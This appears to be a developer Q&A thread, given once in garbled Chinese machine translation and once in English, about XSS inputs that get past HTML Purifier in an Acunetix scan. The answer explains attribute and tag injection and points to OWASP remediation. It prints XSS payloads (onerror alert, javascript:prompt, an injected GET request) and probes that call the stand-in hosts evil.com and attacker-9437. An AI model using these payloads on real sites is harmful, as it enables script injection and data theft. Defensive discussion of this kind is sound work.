从简短的外观来看，所有HTML净化器似乎都在这样做我给的是HTML编码的某些字符，例如< ，> 等。但是，还有其他方法可以在不使用普通HTML字符的情况下调用JS：

  javascript：prompt（1）//在图像标记中
 src = http://evil.com/xss.html //在iFrame代码中
 

请在下方查看评论（@pinkgothic）。

---

要点：

1. 这将是HTML注入，实际上会导致XSS。在这种情况下，您打开< img> 标记，将 src 指向某个不存在的文件，转会引发错误。然后可以通过 onerror 处理程序来运行一些JavaScript代码。以以下示例为例：

< img src = x onerror = alert（document.domain）>

它的入口点通常伴随着过早关闭输入上的另一个标记。例如（为清楚起见，对网址进行了解码）：

  GET /products.php?type=\"><img src = x onerror = prompt（1）> HTTP / 1.1 
 

但是，通过HTML转义元数据可以轻松地将其删除-字符（即< ，> ）。

与上面相同，除了可以关闭HTML属性（而不是标签）并插入其自己的属性。假设您有一个页面，可以在其中上传网址图片：

< img src = $ USER_DEFINED>

一个正常的例子是：

< img src = http：/ /example.com/img.jpg\">

但是，插入上述有效负载后，我们切断 src 属性指向一个不存在的文件并注入 onerror 处理程序：

< img src = 1 onerror = alert（document.domain）>

此e xecutes与上述相同的有效载荷。

---

补救措施

这已被大量记录并进行了多次测试的地方，所以我不会详细介绍。但是，以下两篇文章非常适合该主题，并且可以满足您的所有需求：

1. > https://www.acunetix.com/websitesecurity/cross-site-scripting/


2. https://www.owasp.org/index.php/ XSS_（Cross_Site_Scripting）_Prevention_Cheat_Sheet

I'm testing one of my web application using Acunetix. To protect this project against XSS attacks, I used HTML Purifier. This library is recommended by most of PHP developers for this purpose, but my scan results shows HTML Purifier can not protect us from XSS attacks completely. The scanner found two ways of attack by sending different harmful inputs:

1. 1<img sRc='http://attacker-9437/log.php? (See HTML Purifier result here)
2. 1"onmouseover=vVF3(9185)" (See HTML Purifier result here)

As you can see results, HTML Purifier could not detect such attacks. I don't know if is there any specific option on HTML Purifier to solve such problems, or is it really unable to detect these methods of XSS attacks.
Do you have any idea? Or any other solution?

All the HTML purifier seems to be doing, from the brief look that I gave, was HTML encode certain characters such as <, > and so on. However there are other means of invoking JS without using the normal HTML characters:

javascript:prompt(1)  // In image tags
src="http://evil.com/xss.html"  // In iFrame tags

Please review comments (by @pinkgothic) below.

---

Points below:

1. This would be HTML injection which does effectively lead to XSS. In this case, you open an <img> tag, point the src to some non-existent file which in turn raises an error. That can then be handled by the onerror handler to run some JavaScript code. Take the following example:

<img src=x onerror=alert(document.domain)>

The entrypoint for this it generally accompanied by prematurely closing another tag on an input. For example (URL decoded for clarity):

GET /products.php?type="><img src=x onerror=prompt(1)> HTTP/1.1

This however, is easily mititgated by HTML escaping meta-character (i.e. <, >).

2. Same as above, except this could be closing off an HTML attribute instead of a tag and inserting its own attribute. Say you have a page where you can upload the URL for an image:

<img src="$USER_DEFINED">

A normal example would be:

<img src="http://example.com/img.jpg">

However, inserting the above payload, we cut off the src attribute which points to a non-existent file and inject an onerror handler:

<img src="1"onerror=alert(document.domain)">

This executes the same payload mentioned above.

---

Remediation

This is heavily documented and tested in multiple places, so I won't go into detail. However, the following two articles are great on the subject and will cover all your needs:

1. https://www.acunetix.com/websitesecurity/cross-site-scripting/
2. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet